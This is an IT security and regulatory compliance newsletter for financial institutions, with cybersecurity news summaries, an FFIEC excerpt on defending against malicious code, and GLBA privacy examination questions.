Spending less than 5 minutes a week along
with a cup of coffee, you can monitor your IT
security as required
by the FDIC, OCC, FRB FFIEC, NCUA, NIST, GLBA, HIPAA, and IT best practices.
For more information visit
REMINDER - This newsletter is
available for the Android smart phones and tablets. Go to the
Market Store and search for yennik.
- Pessimism over FISMA deadline starts at the top, survey finds -
Fewer than half of the agencies represented in a recent poll expect
to meet the September deadline for using continuous monitoring to
meet Federal Information Security Management Act reporting
requirements, and C-level executives interviewed were more
pessimistic about their prospects for success than rank-and-file
No Warrant Needed for GPS Monitoring, Judge Rules - A Missouri
federal judge ruled the FBI did not need a warrant to secretly
attach a GPS monitoring device to a suspect’s car to track his
public movements for two months.
Password case reframes Fifth Amendment rights in context of digital
world - Beyond the log-in screen of Ramona Fricosu's laptop computer
lies what federal prosecutors say could be the key evidence in the
bank-fraud case against her.
GAO - Critical Infrastructure Protection: Cybersecurity Guidance Is
Available, but More Can Be Done to Promote Its Use
Release - http://www.gao.gov/products/GAO-12-92
Highlights - http://www.gao.gov/assets/590/587530.pdf
FTC settles with rewards company over security infractions - A
company that helps students save for college may have made them
richer, but also could have opened them up to fraud.
FedRAMP Security Controls Unveiled - Federal Risk and Authorization
Mgt. Program Vets Providers - The federal government has issued some
170 controls for FedRAMP, the program designed to vet cloud
computing providers for federal government agencies.
Israel vows to retaliate after credit cards are hacked - Israel has
said it will respond to cyber-attacks in the same way it responds to
violent "terrorist" acts after the credit card details of thousands
of its citizens were published online.
HSBC ATM Skimmer Arrested - Romanian Charged with $1.5 Million Scam
- New York law enforcement authorities have announced the takedown
of an ATM skimming scheme that compromised more than 40 ATMs at HSBC
bank branches in Manhattan, Long Island, and Westchester, N.Y.
BYOD planning gets a big boost - A key technology to allow for the
secure use of personal devices on the network is virtual desktop
infrastructure. We're making big strides toward our CIO's goal of
enabling a "bring your own device" (BYOD) policy.
ATTACKS, INTRUSIONS, DATA THEFT & LOSS
Saudi hackers plaster 14,000 credit card privates on web - Raid on
Israeli sites exposes up to 400,000 punters - A Saudi Arabian
hacking group claims it has leaked information on up to 400,000
Israelis, including names, addresses and credit card details.
Stratfor subscribers receive phony emails - The hackers who raided
the servers belonging to global intelligence firm Stratfor are using
some of their plunder to send fictitious emails to subscribers.
Hackers say they have Symantec's Norton AV source code - Hackers,
possibly from India, claim they have lifted the source code for
Symantec's Norton AntiVirus product, and are planning to post it.
- Spam with QR code targets mobile users - Researchers have revealed
a new type of spam campaign that appears to be a test run to find
out how mobile users will respond to social engineering attempts on
their smartphones and tablets.
Return to the top
of the newsletter
WEB SITE COMPLIANCE -
Financial institutions advertising or selling non-deposit investment
products on-line should ensure that consumers are informed of the
risks associated with non-deposit investment products as discussed
in the "Interagency Statement on Retail Sales of Non Deposit
Investment Products." On-line systems should comply with this
Interagency Statement, minimizing the possibility of customer
confusion and preventing any inaccurate or misleading impression
about the nature of the non-deposit investment product or its lack
of FDIC insurance.
the top of the newsletter
INFORMATION TECHNOLOGY SECURITY -
We continue our series on the
FFIEC interagency Information Security Booklet.
CONTROLS TO PROTECT AGAINST MALICIOUS CODE
Typical controls to protect against malicious code use technology,
policies and procedures, and training. Prevention and detection of
malicious code typically involves anti-virus and other detection
products at gateways, mail servers, and workstations. Those products
generally scan messages for known signatures of a variety of
malicious code, or potentially dangerous behavioral characteristics.
Differences between products exist in detection capabilities and the
range of malicious code included in their signatures. Detection
products should not be relied upon to detect all malicious code.
Additionally, anti-virus and other products that rely on signatures
generally are ineffective when the malicious code is encrypted. For
example, VPNs, IPSec, and encrypted e-mail will all shield malicious
code from detection.
Signature-based anti-virus products scan for unique components of
certain known malicious code. Since new malicious code is created
daily, the signatures need to be updated continually. Different
vendors of anti-virus products update their signatures on different
frequencies. When an update appears, installing the update on all of
an institution's computers may involve automatically pushing the
update to the computers, or requesting users to manually obtain the
Heuristic anti - virus products generally execute code in a
protected area of the host to analyze and detect any hostile intent.
Heuristic products are meant to defend against previously unknown or
disguised malicious code.
Malicious code may be blocked at the firewall or gateway. For
example, a general strategy might be to block all executable e-mail
attachments, as well as any Active-X or Java applets. A more refined
strategy might block based on certain characteristics of known code.
Protection of servers involves examining input from users and only
accepting that input which is expected. This activity is called
filtering. If filtering is not employed, a Web site visitor, for
instance, could employ an attack that inserts code into a response
form, causing the server to perform certain actions. Those actions
could include changing or deleting data and initiating fund
Protection from malicious code also involves limiting the
capabilities of the servers and Web applications to only include
functions necessary to support operations. See "Systems Development,
Acquisition, and Maintenance."
Anti-virus tools and code blocking are not comprehensive solutions.
New malicious code could have different signatures, and bypass other
controls. Protection against newly developed malicious code
typically comes in the form of policies, procedures, and user
awareness and training. For example, policies could prohibit the
installation of software by unauthorized employees, and regular
reviews for unauthorized software could take place. System users
could be trained not to open unexpected messages, not to open any
executables, and not to allow or accept file transfers in P2P
communications. Additional protection may come from disconnecting
and isolating networks from each other or from the Internet in the
face of a fast-moving malicious code attack.
An additional detection control involves network and host intrusion
detection devices. Network intrusion detection devices can be tuned
to alert when known malicious code attacks occur. Host intrusion
detection can be tuned to alert when they recognize abnormal system
behavior, the presence of unexpected files, and changes to other
Return to the top of
INTERNET PRIVACY - We continue
our series listing the regulatory-privacy examination questions.
When you answer the question each week, you will help ensure
compliance with the privacy regulations.
Reuse & Redisclosure of nonpublic
personal information received from a nonaffiliated financial
institution under Sections 14 and/or 15.
A. Through discussions with management and review of the
institution's procedures, determine whether the institution has
adequate practices to prevent the unlawful redisclosure and reuse of
the information where the institution is the recipient of nonpublic
personal information (§11(a)).
B. Select a sample of data received from nonaffiliated financial
institutions, to evaluate the financial institution's compliance
with reuse and redisclosure limitations.
1. Verify that the institution's redisclosure of the information
was only to affiliates of the financial institution from which the
information was obtained or to the institution's own affiliates,
except as otherwise allowed in the step b below (§11(a)(1)(i) and
2. Verify that the institution only uses and shares the data
pursuant to an exception in Sections 14 and 15 (§11(a)(1)(iii)).